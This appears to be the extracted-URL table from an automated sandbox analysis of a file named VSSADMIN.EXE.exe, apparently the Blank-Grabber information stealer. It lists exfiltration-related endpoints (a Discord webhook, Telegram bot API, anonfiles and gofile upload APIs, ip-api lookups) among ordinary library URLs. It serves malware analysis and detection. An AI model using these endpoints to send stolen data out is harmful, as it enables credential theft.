                        https://duckduckgo.com/chrome_newtabVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Blank-c/BlankOBFVSSADMIN.EXE.exe, 00000001.00000003.191981255.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191835270.0000014C6CD0E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191900080.0000014C6D2C9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192066107.0000014C6CD05000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/botVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Blank-c/Blank-GrabberiVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Blank-c/Blank-GrabberrVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/urllib3/urllib3/issues/2168VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/urllib3/urllib3/issues/2680VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://tools.ietf.org/html/rfc2388#section-4.4VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64VSSADMIN.EXE.exe, 00000001.00000003.192490005.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192251935.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190636870.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191866250.0000014C6CC6F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192002784.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191661797.0000014C6CC6A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190589554.0000014C6CC70000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191646152.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.anonfiles.com/uploadVSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://blank-2MD3E.inVSSADMIN.EXE.exe, 00000001.00000002.245250730.0000014C6D658000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://discord.com/api/v9/users/VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://cacerts.digiVSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://peps.python.org/pep-0205/VSSADMIN.EXE.exe, 00000001.00000003.191782438.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191891921.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191706435.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244706685.0000014C6CAB0000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190653423.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190620855.0000014C6CBDB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192012033.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/urllib3/urllib3/issues/3020VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.200799345.0000019600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB92EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.discordapp.com/attachments/1125126396101021879/1152337129716842596/Blank-user.rarVSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyVSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D540000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688VSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C608000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.microsoftDOWNLO~1JSOy.0VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.micropowershell.exe, 00000008.00000002.200799345.000001960159C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196013E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.0000019601682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196015CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB94965000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerVSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Iconpowershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://httpbin.org/VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sVSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlVSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crl.comodoca.pVSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.gVSSADMIN.EXE.exe, 00000001.00000003.244230392.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0BD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CBB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244259837.0000014C6CFED000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244863597.0000014C6CFEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syVSSADMIN.EXE.exe, 00000001.00000003.189920854.0000014C6ADCA000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189986704.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190043749.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190014863.0000014C6ADC9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6AD99000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189933314.0000014C6ADB1000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244567469.0000014C6ADC2000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com/favicon.icoVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.globalTVSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.python.org/psf/license/VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD40388000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                      		high
                                                                                      http://ip-api.com/line/?fields=hostingrVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.micropowershell.exe, 00000025.00000002.224011476.000001FBAB187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://api.anonfiles.com/uploadrVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://tools.ietf.org/html/rfc6125#section-6.4.3VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D5F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://go.microsoft.cpowershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://google.com/mailVSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://go.microsoft.ctainpowershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyVSSADMIN.EXE.exe, 00000001.00000003.190159085.0000014C6ADD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmVSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://foss.heptapod.net/pypy/pypy/-/issues/3539VSSADMIN.EXE.exe, 00000001.00000002.245121622.0000014C6D2C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://google.com/VSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.gofile.io/getServerrVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://ocsp.sectigo.com0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.python.org/download/releases/2.3/mro/.VSSADMIN.EXE.exe, 00000001.00000003.189820148.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C580000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6CA10000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189806826.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189789642.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNVSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://contoso.com/Licensepowershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://discordapp.com/api/v9/users/VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://search.yahoo.com?fr=crmas_sfpfVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://ip-api.com/json/?fields=225545rVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/urllib3/urllib3/issues/2920VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://media.discordapp.net/attachments/1125126396101021879/1152337129716842596/Blank-user.rarVSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://yahoo.com/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6VSSADMIN.EXE.exe, 00000001.00000003.192742374.0000014C6D005000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D29E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192750598.0000014C6D280000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192683834.0000014C6D250000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D29B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://html.spec.whatwg.org/multipage/VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsVSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D51C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://contoso.com/powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://www.iana.org/time-zones/repository/tz-link.htmlVSSADMIN.EXE.exe, 00000001.00000003.192222187.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7vVSSADMIN.EXE.exe, 00000001.00000002.245142886.0000014C6D3F0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://api.gofile.io/getServerVSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngVSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D24A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://sectigo.com/CPS0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://ocsp.thawte.com0VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzVSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://json.orgVSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://twitter.com/VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://dotnet.micrVSSADMIN.EXE.exe, 00000001.00000003.244243794.0000014C6D092000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://google.com/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://google.com/mail/VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://ac.ecosia.org/autocomplete?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://search.yahoo.com?fr=crmas_sfpVSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://bugs.python.org/issue42195.VSSADMIN.EXE.exe, 00000001.00000003.192780632.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192761325.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192563442.0000014C6CC94000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920PVSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://google.com/mail/VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://github.com/Blank-c/Blank-GrabberVSSADMIN.EXE.exe, 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
